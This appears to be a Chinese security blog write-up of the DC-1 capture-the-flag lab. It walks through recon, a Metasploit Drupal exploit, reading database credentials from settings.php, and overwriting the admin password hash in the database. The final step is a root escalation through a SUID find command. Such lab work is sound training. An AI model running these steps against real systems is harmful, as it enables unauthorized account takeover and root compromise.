freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

DC-1靶场
asun0417 2023-05-15 14:48:01 128214
所属地 河北省

DC-1靶场

1. 靶场安装

下载地址:https://www.five86.com/downloads.html

下载好后解压安装就可,网络编辑器选择net模式,我这边使用的是与kali攻击机在同一网段。

2. 信息收集

使用sudo netdiscover -i eth0 -r 192.168.229.0/24 或者sudo arp-scan -l 查看dc-1靶机的IP地址。

image-20230515120342353.png

我这边的地址是192.168.229.168

nmap查看开放的端口及服务版本号:nmap -sV 192.168.229.168

image-20230515120454381.png

3. 渗透测试

可以看到开放了22 ssh服务,80 http服务,111 rpcbind服务,浏览器访问80端口看一下:

image-20230515120717252.png

image-20230515120727575.png

可以看到是Drupal框架,使用msfconsole搜一下有没有可以利用的

image-20230515123818263.png

查询相关信息 search Durpal

image-20230515123956574.png

逐一尝试后发现序号1可以使用

use 1

show options 查看需要配置的信息

image-20230515124506532.png

set rohst 192.168.229.168

run 运行

image-20230515124628348.png

出现这个标识就表示已经成功了

image-20230515124705639.png

4. 获得权限

shell

image-20230515124926595.png
获得交互界面

python -c 'import pty;pty.spawn("/bin/bash")'

image-20230515125028301.png

ls查看当前文件内的内容

image-20230515125143844.png
有个flag1.txt 查看一下:

cat flag1.txt

image-20230515125256249.png
意思大概是每个好的cms框架都拥有配置文件,你也是。那就看配置文件去咯。

百度下Drupal的配置文件叫做settings.php,那就去找一下。

image-20230515125642964.png

image-20230515125846276.png

位置也大概找出来了,去看一下:

image-20230515130017037.png

果然找到了,看一下内容

image-20230515130146245.png

发现了flag2 意思大概是暴力破解和字典并不是唯一方法,下面又给出了数据库信息。

'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',

直接上数据库

image-20230515131319378.png

查看数据库:show databases;

image-20230515131504331.png

进入drupaldb数据库:use drupaldb;

image-20230515131636055.png

展示数据库中的表 show tables;

image-20230515131741722.png

其中有个users表,查看全部信息。

select * from users;

image-20230515131852074.png

可以查看到用户和加密的密码,既然已经进入到数据库了,就不解密了

之前scripts文件夹包含脚本文件,看一下有个password-hash.sh的文件,看名字应该是密码加密文件,cat命令查看文件内容是php语言写的

image-20230515134203787.png

看一下php 命令也可以运行,试着直接调用这个文件加密123456

image-20230515134425172.png

进入数据库改下admin的密码:

update users set pass="$S$DlOpquKGPrOIP7mdYcaPDlr8lEb/arzt1zOh8HXfjseFyZRGpFBf" where name="admin";

image-20230515134838642.png

进入网站,使用admin账号登录

image-20230515135234917.png

依次点击功能模块,最终找到了flag3,在content模块下

image-20230515135348926.png
image-20230515135358439.png
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow. 大概意思是跟passwd文件和shadow文件有关,去看看呗。

image-20230515140040617.png
有一个flag4用户,转到家目录去看看

image-20230515140214372.png

有个flag4.txt文件。提示是大概要root权限,这不就要提权了

5.提权

SUID提权 (Set UID) linux中的特殊权限,当用户运行一个拥有SUID权限的程序的时候,此进程的属主不是发起者,而是这个程序的属主才是发起者,在这个过程中调用者会拥有这个程序文件属主的权限,利用此原理进行提权。

以下这些命令将从/目录中查找具有SUID权限位且属主为root的文件并输出它们,然后将所有错误重定向到/dev/null,从而仅列出该用户具有访问权限的那些二进制文件。

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} ;

以下是具有suid的命令:

image-20230515141942013.png

find提权find / -exec "/bin/bash" -p ;

image-20230515142813846.png

查找flag

find / -name 'flag'

image-20230515143006585.png

最终flag在/root/目录下面

image-20230515143102525.png

# 渗透测试 # 网络安全 # web安全 # CTF # 网络安全技术
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 asun0417 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
DC靶场+five86靶场
asun0417 LV.4
这家伙太懒了,还未填写个人描述!
  • 9 文章数
  • 3 关注者
DC-5靶场
2023-12-06
dc-4靶场
2023-06-25
DC-3
2023-05-23
文章目录